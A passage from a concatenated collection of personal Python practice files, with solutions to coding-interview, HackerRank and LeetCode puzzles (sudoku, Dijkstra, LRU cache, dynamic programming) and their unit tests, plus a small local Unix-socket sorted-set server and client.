#queue.append(new_price_list)
if new_price_list not in queue:
queue.append(new_price_list)
#end of while:
#queue is empty
#result is full of adequate list of combinations
return result
def list_product(list1, list2):
if len(list1) != len(list2):
assert(False)
sum = 0
for i in range(len(list1)):
sum += list1[i]*list2[i]
return sum
def dup_test(queue):
queue_len = len(queue)
for i in range(queue_len)[:-1:]:
for j in range(queue_len)[i+1::]:
if queue[i] == queue[j]:
                print('oh no:', (i, j), len(queue), queue[i])
#assert(False)
def test1():
mini = 1000
maxi = 1000
possible_list = [ 25, 10, 5, 1 ]
#change = 99
#possible_list = [ 19, 6 ,7, 17 ]
result = getCombiForCents_wrapper(possible_list, mini, maxi)
    print(result)
    print(len(result))
if __name__=="__main__":
#print list_product([3,4,5],[1,2,1])
import pdb
test1()
#dup_test([1,2,3,9,5,6,7,8,9])
```
#### File: 00.organize.me/Cracking the Coding Interview/p064_00_getLeastIntFromRotatedSequence.py
```python
def getLeastIntFromRotatedSequence(ls):
left=0
right=len(ls)-1
if ( ls[left] < ls[right] ):
return ls[0]
while(right-left != 1):
        mid = (left+right) // 2
if( ls[left] <= ls[mid] ):
left = mid
else:
right = mid
#out of loop, right must be the index of the least int
return ls[right]
test_ls= [ [3,4,5,6,7,-11,2],
[5,6,7,3,4,5,5,5],
[1,2],
[2,1],
[-100,0,100],
[3,100,1],
[10,1,2,3,4,5,6,7,8,9],
[2,3,4,5,6,7,8,9,10,1] ]
#test part
for each_list in test_ls:
    print(getLeastIntFromRotatedSequence( each_list ))
```
#### File: 00.organize.me/Cracking the Coding Interview/p140_01_stairways_recur.py
```python
def stairways_recur(n_step):
if n_step < 1:
return []
elif n_step == 1:
return [[1]]
result = []
result1 = joiner( 1, stairways_recur(n_step-1) )
result2 = joiner( 2, stairways_recur(n_step-2) )
result3 = joiner( 3, stairways_recur(n_step-3) )
result = result1 + result2 + result3
return result
def joiner(ele, double_list):
result = []
for single_list in double_list:
result.append( [ele] + single_list[:] )
return result
if __name__ == "__main__":
result = stairways_recur(10)
    print(result)
    print(len(result))
```
#### File: 00.organize.me/Cracking the Coding Interview/prison_break.py
```python
import unittest
from math import factorial
from functools import reduce
from operator import mul
from itertools import combinations_with_replacement as comb_r
def prisoners(days):
    '''Ah... the number of cases from comb_r grows exponentially, so a realistic computation is infeasible.'''
if days < 100:
return 0
up1 = factorial(100)
down1 = 100**100
up2 = sum(reduce(mul, each) for each in comb_r(range(1, 101), days-100)) if days>100 else 1
down2 = 100 ** (days-100)
return up1 / down1 * up2 / down2
def stats():
days = 1
while True:
person = 1 - (0.99)**days
yield days, person**100
days += 1
def prisoners_simple():
it_stats = stats()
thresholds = [0.5, 0.6, 0.70, 0.80, 0.90, 0.95,\
0.99, 0.999, 0.9999, 0.99999, 0.999999, 0.9999999999, 1]
for threshold in thresholds:
while True:
days, thres = next(it_stats)
if threshold <= thres:
print("threshold(%s): %s days" %(thres, days))
break
class XTest(unittest.TestCase):
def test_method1(self):
s = stats()
while True:
days, p1 = next(s)
if days==101:
break
p2 = prisoners(101)
self.assertEqual(p1, p2)
if __name__=="__main__":
prisoners_simple()
unittest.main()
```
#### File: 00.organize.me/Cracking the Coding Interview/product.py
```python
def product(*lists):
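    # Cartesian product generator: idx_list works as a mixed-radix counter over the input lists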
for ls in lists:
assert len(ls)>0
idx_list = [0]*len(lists)
len_list = [len(ls) for ls in lists]
while True:
val_list = []
# ex) idx_list = [0,1,0]
for i,idx in enumerate(idx_list):
val_list.append(lists[i][idx])
yield val_list
try:
idx_list = add_one(len_list, idx_list)
except ValueError:
break
def add_one(radix_list, idx_list):
#pre-assertion
assert len(radix_list) == len(idx_list)
if radix_list==[idx+1 for idx in idx_list]:
raise ValueError
for i, val in enumerate(idx_list):
assert radix_list[i] > val
#logic
idx_list[-1]+=1
for digit in range(len(idx_list))[::-1]:
if idx_list[digit] == radix_list[digit]:
#transactional
idx_list[digit-1] += 1
idx_list[digit] = 0
else:
break
#post-assertion
for i, val in enumerate(idx_list):
assert radix_list[i] > val
return idx_list
if __name__=="__main__":
print('implemented_product')
#for each in product('ㄱㄴㄷ','abc','123'):
# print(each)
    result = product('ㄱㄴㄷ','abc','123')
    try:
        while True:
            print(next(result))
    except StopIteration:
        pass
```
#### File: 00.organize.me/Cracking the Coding Interview/sudoku.py
```python
import unittest
def parse(s):
lines = [line.strip() for line in s.strip().splitlines()]
res = []
for line in lines:
li = []
for e in line:
if e == '*':
li.append(None)
else:
li.append(int(e))
res.append(li)
return res
def sudoku(s):
''' returns True if s is fully filled successfully. False, otherwise '''
def pick_one(s):
for i in range(9):
for j in range(9):
if s[i][j] == None:
return i,j
def is_sudoku_complete(s):
for line in s:
if None in line:
return False
return True
def is_possible(s, i, j, v):
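        # v may go at (i,j) only if it is absent from row i, column j, and the enclosing 3x3 box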
if v in s[i]:
return False
for r in range(9):
if s[r][j] == v:
return False
r_start = (i//3)*3
c_start = (j//3)*3
for r in range(r_start, r_start+3):
for c in range(c_start, c_start+3):
if s[r][c]==v:
return False
return True
i,j = pick_one(s)
for v in range(1,10):
if not is_possible(s,i,j,v):
continue
s[i][j] = v
if is_sudoku_complete(s):
return True
if sudoku(s):
return True
s[i][j] = None
return False
class SudokuTest(unittest.TestCase):
def setUp(self):
self.sample = '''
128**547*
**5*8*39*
9*36428**
4**51*68*
78*4*3*59
*36*98**1
**43791*8
*69*2*5**
*178**924'''
self.sample2 = '''
*2*63****
6**4***1*
****5**7*
**39****4
**8***6**
7****35**
*4**2****
*5***8**9
****91*3*
'''
self.sample3 = '''
*********
*********
*********
*********
*********
*********
*********
*********
*********
'''
def test_parse(self):
s = parse(self.sample)
self.assertEqual(len(s), 9)
for i in range(9):
self.assertEqual(len(s[i]), 9)
def test_sudoku(self):
s = parse(self.sample3)
succeed = sudoku(s)
self.assertTrue(succeed)
import pprint
pprint.pprint(s)
for line in s:
self.assertEqual(sum(line), 45)
for col in range(9):
col_sum = 0
for row in range(9):
col_sum += s[row][col]
self.assertEqual(col_sum, 45)
for r in [0,3,6]:
for c in [0,3,6]:
self.assertEqual(sum(s[x][y] for x in [r,r+1,r+2] for y in [c,c+1,c+2]), 45)
if __name__=="__main__":
unittest.main()
```
#### File: hackerrank/sorted_set/client.py
```python
import socket
import struct
import threading
SERVER_SOCKET_PATH = "./socket"
FMT = "!L"
def read_number_from_socket(connection):
return struct.unpack(FMT, connection.recv(4))[0]
def write_number_to_socket(connection, number):
connection.send(struct.pack(FMT, number))
def client(t_id):
sock = socket.socket(socket.AF_UNIX)
sock.connect(SERVER_SOCKET_PATH)
with open('./input.txt', 'r') as fp:
commands = fp.read()
for command in commands.splitlines():
for opt in command.split():
sock.send(struct.pack(FMT, int(opt)))
value_cnt = read_number_from_socket(sock)
print(value_cnt)
for _ in range(value_cnt):
value = read_number_from_socket(sock)
#print('tid', t_id, value)
print(value)
sock.close()
    print('terminated', t_id)
def main():
for t_id in range(1):
t = threading.Thread(target=client, args=(t_id,))
t.start()
if __name__ == "__main__":
main()
```
#### File: hackerrank/sorted_set/server2.py
```python
import socket, threading
from queue import Queue
import sys, struct
# NOTE: Use this path to create the UDS Server socket
SERVER_SOCKET_PATH = "./socket"
class Result:
def __init__(self):
self._evt = threading.Event()
self._result = None
def set_result(self, value):
self._result = value
self._evt.set()
def result(self):
self._evt.wait()
return self._result
class ActorExit(Exception):
pass
class Actor(object):
def __init__(self):
self._mailbox = Queue()
def send(self, msg):
self._mailbox.put(msg)
def recv(self):
msg = self._mailbox.get()
if msg is ActorExit:
raise ActorExit()
return msg
def close(self):
self.send(ActorExit)
def start(self):
self._terminated = threading.Event()
t = threading.Thread(target=self._bootstrap)
t.daemon = True
t.start()
def _bootstrap(self):
try:
self.run()
except ActorExit:
pass
finally:
self._terminated.set()
def join(self):
self._terminated.wait()
def run(self):
while True:
msg = self.recv()
class Worker(Actor):
def __init__(self):
super().__init__()
self.db = {}
def submit(self, values):
r = Result()
self.send((values, r))
return r
def run(self):
while True:
values, r = self.recv()
r.set_result(self.execute(values))
def execute(self, values):
cmd, *opts = values
print('[*]', cmd, opts)
if cmd == 1: #add
s, k, v = opts
self.db.setdefault(s, {})
self.db[s][k] = v
return [0]
elif cmd == 2: #remove
s, k = opts
if s in self.db and k in self.db[s]:
self.db[s].pop(k)
return [0]
elif cmd == 3: #get size
s = opts[0]
size = len(self.db[s]) if s in self.db else 0
return [1, size]
elif cmd == 4: #get value
s, k = opts
if s in self.db and k in self.db[s]:
score = self.db[s][k]
else:
score = 0
return [1, score]
elif cmd == 5: #range
*sets, _, lower, upper = opts
res = []
for s in sets:
if s not in self.db:
continue
for k,v in self.db[s].items():
if lower <= v <= upper:
res.append((k,v))
res.sort()
return [len(res)*2] + [e for kv in res for e in kv]
elif cmd == 6: #disconnect
return None
else:
raise Exception("Not supported CMD(%s)" % (cmd))
FMT = "!L"
def read_number_from_socket(connection):
return struct.unpack(FMT, connection.recv(4))[0]
def write_number_to_socket(connection, number):
connection.send(struct.pack(FMT, number))
def process_client_connection(connection, worker):
while True:
value_num = read_number_from_socket(connection)
values = []
for _ in range(value_num):
values.append(read_number_from_socket(connection))
res = worker.submit(values)
if res.result() == None:
break
for num in res.result():
write_number_to_socket(connection, num)
connection.close()
def main():
worker = Worker()
worker.start()
s = socket.socket(socket.AF_UNIX)
s.bind(SERVER_SOCKET_PATH)
s.listen(1)
while True:
cl, addr = s.accept()
t = threading.Thread(target = process_client_connection, args=(cl, worker))
t.start()
#worker.close()
s.close()
if __name__ == '__main__':
main()
```
#### File: quizzes/00.organize.me/tree_with_insert_at.py
```python
class Solution:
# @param A : list of integers
# @param B : list of integers
# @return a list of integers
def order(self, A, B):
root = None
for _id, k in zip(A,B):
root = insert_at(root, k, Node(_id))
return list(n._id for n in traverse_in_order(root))
class Node(object):
def __init__(self, _id):
self._id = _id
self.left = self.right = None
self.size = 1
def set_left(self, left):
self.left = left
self.resize()
return self
def set_right(self, right):
self.right = right
self.resize()
return self
def resize(self):
self.size = 1 + get_size(self.left) + get_size(self.right)
def get_size(node):
if not node: return 0
return node.size
def insert_at(root, k, node):
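    # insert `node` so it becomes the k-th element (0-based) of the in-order traversal, guided by subtree sizes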
assert node
if not root: return node
if k < 0: k = 0
if k > root.size: k = root.size
left_size = get_size(root.left)
if left_size > k:
return root.set_left(insert_at(root.left, k, node))
elif left_size == k:
l = root.left
root.set_left(None)
node.set_left(l)
node.set_right(root)
return node
else:
new_right = insert_at(root.right, k-1-left_size, node)
root.set_right(new_right)
return root
def traverse_in_order(node):
if not node: return
if node.left: yield from traverse_in_order(node.left)
yield node
if node.right: yield from traverse_in_order(node.right)
```
#### File: 2019/02.you_can_go_your_own_way/solution.py
```python
def solve(n, her_path):
return ''.join(['E' if c=='S' else 'S' for c in her_path])
def main():
t = int(input())
for i in range(1, t+1):
n = int(input())
her_path = input().strip()
my_path = solve(n, her_path)
print("Case #{}: {}".format(i, my_path))
if __name__ == "__main__":
main()
```
#### File: 2019/03.cryptopangrams/test.py
```python
import unittest
from solution import solve
from string import ascii_uppercase
C2P = {'A': 2, 'B': 3, 'C': 5, 'D': 7, 'E': 11, 'F': 13, 'G': 17, 'H': 19, 'I': 23, 'J': 29, 'K': 31, 'L': 37, 'M': 41, 'N': 43, 'O': 47, 'P': 53, 'Q': 59, 'R': 61, 'S': 67, 'T': 71, 'U': 73, 'V': 79, 'W': 83, 'X': 89, 'Y': 97, 'Z': 101}
P2C = {2: 'A', 3: 'B', 5: 'C', 7: 'D', 11: 'E', 13: 'F', 17: 'G', 19: 'H', 23: 'I', 29: 'J', 31: 'K', 37: 'L', 41: 'M', 43: 'N', 47: 'O', 53: 'P', 59: 'Q', 61: 'R', 67: 'S', 71: 'T', 73: 'U', 79: 'V', 83: 'W', 89: 'X', 97: 'Y', 101: 'Z'}
def assert_pangram(text):
assert len(set(text)) == 26
def make_ciphertext(plain_text):
text = plain_text.replace(' ', '').upper()
assert_pangram(text)
cipher = []
for c1, c2 in zip(text, text[1:]):
cipher.append(C2P[c1] * C2P[c2])
return ' '.join(map(str, cipher))
class SolutionTest(unittest.TestCase):
def test_make_ciphertext(self):
cipher = make_ciphertext('jin choi' + ascii_uppercase)
print(cipher)
def test_basic1(self):
cipher = make_ciphertext('jin choi' + ascii_uppercase)
plain = solve(cipher)
print(plain)
def test_min_at_first(self):
''' enforce min_i is the first'''
cipher = make_ciphertext('aa' + ascii_uppercase + 'zz')
plain = solve(cipher)
print(plain)
def test_min_at_last(self):
''' enforce min_i is the last'''
cipher = make_ciphertext('zz' + ascii_uppercase + 'aa')
plain = solve(cipher)
print(plain)
unittest.main()
```
#### File: quizzes/cracking_coding_interview/0202.minus_kth_in_linked_list.py
```python
def inversely_kth(ll, k):
    # `ll` is treated here as a plain Python list (matching the tests below); a real linked-list
    # version would walk two pointers k nodes apart instead of indexing
    if not 0 <= k < len(ll):
        return None
    return ll[-(k + 1)]
import unittest
class SolutionTest(unittest.TestCase):
def test_basics(self):
self.assertInverselyKth([], 0, None)
self.assertInverselyKth([], 3, None)
self.assertInverselyKth([1], 0, 1)
self.assertInverselyKth([1], 1, None)
self.assertInverselyKth([1,2], 0, 2)
self.assertInverselyKth([1,2], 1, 1)
self.assertInverselyKth([1,2], 2, None)
self.assertInverselyKth([1,2,3,4,5], 0, 5)
self.assertInverselyKth([1,2,3,4,5], 1, 4)
self.assertInverselyKth([1,2,3,4,5], 2, 3)
self.assertInverselyKth([1,2,3,4,5], 3, 2)
self.assertInverselyKth([1,2,3,4,5], 4, 1)
self.assertInverselyKth([1,2,3,4,5], 5, None)
    def assertInverselyKth(self, ll, k, expected_val):
        self.assertEqual(inversely_kth(ll, k), expected_val)
if __name__ == "__main__":
unittest.main()
```
#### File: etc/arrays/rotate_matrix.py
```python
from jpylib.jitertools import ring_iter
from collections import deque
def rotate_matrix(matrix):
''' shift elements to clockwise direction by 1 '''
i, j = 0, 0
n = len(matrix)
h = n >> 1
while i < h:
#subtask
rotate_ring(matrix, i, n-1-i, i, n-1-i)
i += 1
j += 1
return matrix
def rotate_ring(matrix, T, B, L, R):
i0 = T
dq = deque([matrix[i0+1][i0]])
for i,j in ring_iter(T, B, L, R):
dq.append(matrix[i][j])
val = dq.popleft()
matrix[i][j] = val
if __name__ == "__main__":
import unittest
class SolutionTest(unittest.TestCase):
def test_basics(self):
self.assertEqual(rotate_matrix([]), [])
self.assertEqual(rotate_matrix([[1]]), [[1]])
self.assertEqual(rotate_matrix([[1,2],[3,4]]), [[3,1],[4,2]])
self.assertEqual(rotate_matrix([[1,2,3],[4,5,6],[7,8,9]]), [[4,1,2],[7,5,3],[8,9,6]])
self.assertEqual(rotate_matrix([[1,2,3,4],[5,6,7,8],[9,10,11,12],[13,14,15,16]]),
[[5,1,2,3],[9,10,6,4],[13,11,7,8],[14,15,16,12]])
unittest.main()
```
#### File: quizzes/euler_prime_quiz/prime.py
```python
from math import sqrt
fp = open('./euler.txt', 'r')
euler = fp.readline().strip()[2:] #remove 2.7
def get_euler(fr, to):
global euler
if fr <= to <= len(euler):
return euler[fr:to]
#append if possible
line = fp.readline()
if(line):
euler = euler + line.strip()
return get_euler(fr, to)
#doom!
return None
def test_get_euler():
for i in range(100):
ee = get_euler(i, i+10)
print(ee)
def is_prime(n):
for i in range(2, int(sqrt(n))+1):
if(n%i==0): return False
else:
return True
def main():
for i in range(0,500):
x = get_euler(i, i+10)
x = int(x)
if(len(str(x))!=10): continue
if( is_prime(x) ):
print("")
print("prime: ", x)
else:
print('.', sep="", end="")
if __name__ == '__main__':
main()
#test_get_euler()
#close always
fp.close()
```
#### File: algorithms/dp/lego_blocks.py
```python
import sys
sys.setrecursionlimit(100000)
MOD = 1000000007
ROW_COMBIS = [1, 1, 2, 4, 8]
TOT_COMBIS = [1, 1]
SOL_COMBIS = []
NOTSOL_COMBIS = []
def lego(n, m):
assert 1<=n<=1000 and 1<=m<=1000
global TOT_COMBIS, SOL_COMBIS, NOTSOL_COMBIS
TOT_COMBIS = [1, 1]
SOL_COMBIS = [1, 1] + [None] * (m-1)
NOTSOL_COMBIS = [0, 0] + [None] * (m-1)
for x in range(m+1):
solid(n, x)
return solid(n, m)
def solid(n, m):
if SOL_COMBIS[m] == None:
ans = total(n, m) - not_solid(n, m)
ans %= MOD # in case it becomes negative
SOL_COMBIS[m] = ans
return SOL_COMBIS[m]
def total(n, m):
while m >= len(ROW_COMBIS):
val = sum(ROW_COMBIS[-4:]) % MOD
ROW_COMBIS.append(val)
while m >= len(TOT_COMBIS):
l = len(TOT_COMBIS)
val = pow(ROW_COMBIS[l], n, MOD)
TOT_COMBIS.append(val)
return TOT_COMBIS[m]
def not_solid(n, m):
if NOTSOL_COMBIS[m] == None:
parts = 0
for i in range(1, m):
parts += solid(n, i) * total(n, m-i)
parts %= MOD
NOTSOL_COMBIS[m] = parts
return NOTSOL_COMBIS[m]
def main():
t = int(input())
for _ in range(t):
n, m = map(int, input().split())
print(lego(n, m))
#main()
import unittest
class SolutionTest(unittest.TestCase):
def test_basics(self):
self.assertEqual(lego(2,2), 3)
self.assertEqual(lego(3,2), 7)
self.assertEqual(lego(2,3), 9)
self.assertEqual(lego(4,4), 3375)
if __name__ == "__main__":
unittest.main()
```
#### File: algorithms/dp/substring_diff.py
```python
from collections import deque
def substring_diff(S, P, Q):
p_len = len(P)
assert 0 <= S <= p_len
p_len = len(P)
ans = 0
for j in range(p_len):
ans = max(ans, diagonal_max_length(S, P, Q, 0, j))
for i in range(1, p_len):
ans = max(ans, diagonal_max_length(S, P, Q, i, 0))
return ans
def diagonal_max_length(S, P, Q, i, j):
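    # slide a window along one diagonal of the P/Q alignment, allowing at most S mismatches inside it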
p_len = len(P)
ans = 0
left = -1
mismatches = deque() #offset for mismatches
for right in range(p_len - max(i, j)):
ni, nj = i+right, j+right
if P[ni]==Q[nj]:
pass
elif S > 0:
S -= 1
mismatches.append(right)
else:
left = mismatches.popleft() if mismatches else right
mismatches.append(right)
length = right - left
ans = max(ans, length)
return ans
def main():
t = int(input())
for _ in range(t):
_S, P, Q = input().split()
S = int(_S)
L = substring_diff(S, P, Q)
print(L)
#main()
import unittest
class SolutionTest(unittest.TestCase):
def test_basics(self):
for S,P,Q,ANS in [(2,'tabriz','torino',4), \
(0,'abacba','abcaba',3), \
(3,'helloworld','yellowmarin',8)]:
self.assertEqual(substring_diff(S, P, Q), ANS)
if __name__ == "__main__":
unittest.main()
```
#### File: algorithms/dp/xor_and_sum.py
```python
MOD = 1000000007
def solution(a, b):
a = int(a, base=2)
b = int(b, base=2)
return xor_and_sum(a, b)
def xor_and_sum(a, b):
s = 0
for i in range(314159+1):
s += a ^ (b<<i)
return s % MOD
def main():
a, b = input(), input()
print(solution(a, b))
#main()
import unittest
class SolutionTest(unittest.TestCase):
def test_basics(self):
a, b = '10', '1010'
self.assertEqual(solution(a, b), 489429555)
if __name__ == "__main__":
unittest.main()
```
#### File: algorithms/graph/dijkstra_shortest_path.py
```python
from collections import defaultdict
from math import inf
from jpylib.jqueues import PriorityQueue
def solution(n, g, s):
''' return shortest distance from `s` to
other edges in ascending order of node id
return [ distance :: int ] '''
dists = [inf] * (n+1) # dist[0] is dummy
dists[s] = 0
pq = PriorityQueue([(0,s)])
while pq.not_empty():
dist, here = pq.pop()
        if dists[here] < dist:
            # a shorter route to `here` was found after this entry
            # was pushed onto the pq, so do not expand `here` again
            continue
for there, cost in g[here].items():
next_dist = dists[here]+cost
            if dists[there] > next_dist:
                # plays the role of BFS's `discovered` set: runs only
                # when a shorter way to reach `there` has been found
                dists[there] = next_dist
pq.push((next_dist, there))
return dist_in_order(n, s, dists)
def dist_in_order(n, s, dists):
res = []
for u in range(1, n+1):
if u==s: continue
d = -1 if dists[u] == inf else dists[u]
res.append(d)
return res
def g_add(g, x, y, r):
g[x][y] = min(r, g[x].get(y, inf))
g[y][x] = min(r, g[y].get(x, inf))
def main():
t = int(input().strip())
for a0 in range(t):
g = defaultdict(dict) # {u: {v:r} }
n,m = input().strip().split(' ')
n,m = [int(n),int(m)]
for a1 in range(m):
x,y,r = input().strip().split(' ')
x,y,r = [int(x),int(y),int(r)]
g_add(g, x, y, r)
s = int(input().strip())
print(*solution(n, g, s))
#main()
import unittest
class SolutionTest(unittest.TestCase):
def test_basics(self):
n, m = 4, 4
g = defaultdict(dict)
g_add(g, 1, 2, 24)
g_add(g, 1, 4, 20)
g_add(g, 3, 1, 3)
g_add(g, 4, 3, 12)
s = 1
self.assertEqual(solution(n, g, s), [24,3,15])
if __name__ == "__main__":
unittest.main()
```
#### File: programming/arrays/n_over_3_repeat_number.py
```python
from collections import Counter
class Solution:
# @param A : tuple of integers
# @return an integer
def repeatedNumber(self, A):
c = Counter(A)
most_freq = c.most_common(1)
if not most_freq:
return -1
i, cnt = most_freq[0]
return i if len(A)/3 < cnt else -1
import unittest
class SolutionTest(unittest.TestCase):
def test_basics(self):
sol = Solution()
self.assertEqual(sol.repeatedNumber([]), -1)
self.assertEqual(sol.repeatedNumber([1,2,3,1,1]), 1)
self.assertEqual(sol.repeatedNumber([3,3,3]), 3)
self.assertEqual(sol.repeatedNumber([1,2,3]), -1)
self.assertEqual(sol.repeatedNumber([1,2,3,4,5]), -1)
if __name__ == "__main__":
unittest.main()
```
#### File: programming/binary_search/rotated_sorted_array_search.py
```python
class Solution:
# @param A : tuple of integers
# @param B : integer
# @return an integer
def __init__(self, min_index):
self.min_index = min_index
def search(self, arr, target):
n = len(arr)
r = self.min_index(arr)
i, j = r, r+n-1
while i<=j:
k = i+j>>1
if arr[k%n] == target:
return k%n
elif arr[k%n] > target:
j = k-1
else:
i = k+1
return -1
def min_index_nodup_1(arr):
''' @param arr: unique elements
@return min index of the smallest value in arr
Time Complexity O(lgn) '''
n = len(arr)
i, j = 0, n-1
if arr[i] < arr[j]:
return 0
assert arr[i] > arr[j]
while j-i > 1:
k = i+j>>1
if arr[i] < arr[k]: i = k
elif arr[k] < arr[j]: j = k
#assert j-i <= 1
return j
def min_index_nodup_2(arr):
''' @param arr: unique elements
@return min index of the smallest value in arr
Time Complexity O(lgn) '''
n = len(arr)
i, j = 0, n-1
if arr[i] < arr[j]:
return 0
assert arr[i] > arr[j]
while i < j:
k = i+j>>1
if arr[i] < arr[k]: i = k+1
else: j = k
return i
# NOTE : Think about the case when there are duplicates.
# Q: Does your current solution work? A: No
# Q: How does the time complexity change? A: It degrades from O(lg n) to O(n) in the worst case
def min_index_dup_1(arr, i, j):
''' @param arr: duplicate elements
@return min index of the smallest value in arr
Time Complexity Omega(lgn) ~ O(n) '''
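    # e.g. [3,3,3,3,3,3] gives no information at the midpoints, so both halves must be searched (the O(n) case)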
n = j-i+1
assert n > 0
if n==1: return 0
if n==2: return 0 if arr[i] <= arr[j] else j
if arr[i] < arr[j]:
return 0
elif arr[i] > arr[j]:
while i+1 < j:
k = i+j>>1
if arr[i] <= arr[k]:
i = k
else:
j = k
return j
else:
k = i+j>>1
res1 = min_index_dup_1(arr, i, k)
if res1 > 0:
return res1
return min_index_dup_1(arr, k, j)
import unittest
class SolutionTest(unittest.TestCase):
def setUp(self):
self.sols = [Solution(min_index_nodup_1), Solution(min_index_nodup_2)]
def test_basics(self):
for sol in self.sols:
arr = [194,195,196,197,198,199,201,203,204,1,
2,3,4,5,6,7,8,9,11,12,
13,14,15,16,17,18,20,21,22,23,
24,25,26,27,29,30,31,32,33,34,
35,36,37,39,40,42,43,44,45,47,
48,49,50,51,52,53,54,55,57,58,
59,60,61,63,65,66,68,69,70,71,
73,74,76,77,79,80,81,82,83,84,
86,87,88,89,91,92,93,94,95,97,
98,99,101,103,104,105,106,107,108,109,
110,113,114,115,117,118,120,121,122,123,
124,127,128,130,131,133,134,135,136,137,
139,140,141,142,143,144,146,147,148,149,
150,151,152,153,154,155,158,159,160,161,
162,163,164,166,167,169,170,171,172,174,
175,177,178,179,181,182,184,185,187,189,
190,192,193]
self.assertEqual(sol.search(arr, 1), 9)
class DuplicateArrayTest(unittest.TestCase):
def test_basics(self):
arrays = [[1], [1,1], [1,2,3,4,5,6], [2,3,1,1], [3,3,3,3,3,3], [3,3,3,3,3,3,2,3]]
indexes = [0, 0, 0, 2, 0, 6]
for arr, idx in zip(arrays, indexes):
i, j = 0, len(arr)-1
self.assertEqual(min_index_dup_1(arr, i, j), idx)
if __name__ == "__main__":
unittest.main()
```
#### File: programming/dp/min_jumps_array.py
```python
from collections import deque
from itertools import chain
class GreedySolution:
# Time Complexity: O(len(A) + sum(A))
# @param A : list of integers
# @return an integer
def jump(self, A):
n = len(A)
here, target = 0, n-1
jumps = 0
while here < target:
here_jump = A[here]
theres = [here+dx for dx in range(1, here_jump+1) if here+dx < n]
if theres == []:
return -1
if here+here_jump >= target:
here = target
jumps += 1
else:
new_here = max([(there+A[there], there) for there in theres])[1]
here = new_here
jumps += 1
#assert here == target
return jumps
class DPSolution:
# Time Complexity: O(len(A) * max(A))
# @param A : list of integers
# @return an integer
def jump(self, A):
n = len(A)
start, stop = 0, n-1
#minjumps[i] := minimum jumps to reach ith position from starting point
#minjumps[k] == -1 means it's not reachable from the starting point
minjumps = [-1 for _ in range(n)]
minjumps[start] = 0
to_visit = deque([start])
while to_visit:
here = to_visit.popleft()
if here == stop:
return minjumps[here]
for there in self.possible_theres(here, A[here], minjumps):
if minjumps[there] >= 0:
continue
assert minjumps[there] == -1
minjumps[there] = 1 + minjumps[here]
to_visit.append(there)
return -1
def possible_theres(self, here, maxjump, minjumps):
n = len(minjumps)
for dx in chain(range(-maxjump,0), range(1,maxjump+1)):
there = here + dx
if 0 <= there < n:
yield there
import unittest
class SolutionTest(unittest.TestCase):
def setUp(self):
self.solutions = [GreedySolution(), DPSolution()]
def test_basics(self):
for sol in self.solutions:
self.assertEqual(sol.jump([2,2,1,0,4]), -1)
self.assertEqual(sol.jump([2,3,1,1,4]), 2)
if __name__ == "__main__":
unittest.main()
```
#### File: programming/greedy/gas_station.py
```python
class Solution:
# @param A : tuple of integers
# @param B : tuple of integers
# @return an integer
def canCompleteCircuit(self, A, B):
n = len(A)
start = 0
while start < n:
success, new_start = self.reachable_from(A, B, start)
if success:
return start
start = new_start
return -1
def reachable_from(self, A, B, start):
''' @return (success::bool, new_start::int) '''
i,t = start, 0
n = len(A)
tank = 0
while t < n:
gas, cost = A[i%n], B[i%n]
tank += gas - cost
if tank < 0: break
i, t = i+1, t+1
if t >= n:
return (True, n)
else:
return (False, i+1)
import unittest
class SolutionTest(unittest.TestCase):
def test_basics(self):
sol = Solution()
self.assertEqual(sol.canCompleteCircuit([1,2], [2,1]), 1)
self.assertEqual(sol.canCompleteCircuit([1,2], [99,99]), -1)
if __name__ == "__main__":
unittest.main()
```
#### File: programming/hashing/two_sum.py
```python
class Solution:
# @param A : tuple of integers
# @param B : integer
# @return a list of integers
def twoSum(self, A, B):
failmap = {}
for ai, av in enumerate(A, 1):
if B-av in failmap:
return [failmap[B-av], ai]
failmap[av] = ai
return []
import unittest
from math import nan
class SolutionTest(unittest.TestCase):
def test_basics(self):
sol = Solution()
self.assertEqual(sol.twoSum([], nan), [])
self.assertEqual(sol.twoSum([2, 7, 11, 15], 9), [1,2])
if __name__ == "__main__":
unittest.main()
```
#### File: quizzes/leetcode/0146_lrucache.py
```python
class LRUCache:
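    # dict gives O(1) key lookup; the doubly linked list keeps usage order for O(1) eviction of the least recently used entry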
def __init__(self, capacity: int):
self.cap = capacity
self.d = {}
self.ll = LinkedList()
def get(self, key: int) -> int:
if key not in self.d:
return -1
n = self.d[key]
self.ll.movetoend(n)
return n.data[1]
def put(self, key: int, value: int) -> None:
if key in self.d:
n = self.d[key]
self.ll.movetoend(n)
n.data = (key, value)
return
if self.cap <= self.ll.sz:
old = self.ll.popleft()
self.d.pop(old.data[0])
node = Node((key, value))
self.ll.append(node)
self.d[key] = node
class Node:
__slots__ = ['data', 'prev', 'next']
def __init__(self, data):
self.data = data
self.prev, self.next = None, None
class LinkedList:
def __init__(self):
self.head, self.tail= None, None
self.sz = 0
def popleft(self):
if self.sz == 0:
return None
elif self.sz == 1:
n1 = self.head
self.head = self.tail = None
self.sz = 0
n1.next = None
return n1
else:
n1 = self.head
n2 = n1.next
n1.next = None
n2.prev = None
self.head = n2
self.sz -= 1
return n1
def append(self, node):
if self.sz == 0:
self.head = self.tail = node
self.sz = 1
else:
t1 = self.tail
t1.next = node
node.prev = t1
self.tail = node
self.sz += 1
def movetoend(self, node):
if node == self.tail:
return
#assert node != self.tail
if node == self.head:
n1 = self.head
n2 = n1.next
n1.next = None
n2.prev = None
self.head = n2
self.sz -= 1
self.append(n1)
else:
#assert node.prev
#assert node.next
pr, nx = node.prev, node.next
pr.next = nx
nx.prev = pr
node.next, node.prev = None, None
self.sz -= 1
self.append(node)
# Your LRUCache object will be instantiated and called as such:
# obj = LRUCache(capacity)
# param_1 = obj.get(key)
# obj.put(key,value)
'''
Runtime: 140 ms, faster than 51.55% of Python3 online submissions for LRU Cache.
Memory Usage: 21.7 MB, less than 6.96% of Python3 online submissions for LRU Cache.
'''
```
#### File: quizzes/leetcode/0287_find_dup.py
```python
def find_dup(ns):
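    # Floyd's tortoise-and-hare cycle detection on the sequence i -> ns[i]; the cycle entry is the duplicated value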
if len(ns) <= 1:
return -1
slow, fast = ns[0], ns[ns[0]]
while slow != fast:
slow = ns[slow]
fast = ns[ns[fast]]
fast = 0
while fast != slow:
fast = ns[fast]
slow = ns[slow]
return slow
```
#### File: tools/dahyeprinter/test_printer.py
```python
import unittest
from printer import pages_in_order, _pairing, _taking_odd, _taking_even, _flattening
class PrinterTest(unittest.TestCase):
def test_even_pages(self):
tot_pages, per_each_page = 4, 1
fp, sp = pages_in_order(tot_pages, per_each_page)
self.assertEqual(fp, [1,3])
self.assertEqual(sp, [4,2])
def test_odd_pages(self):
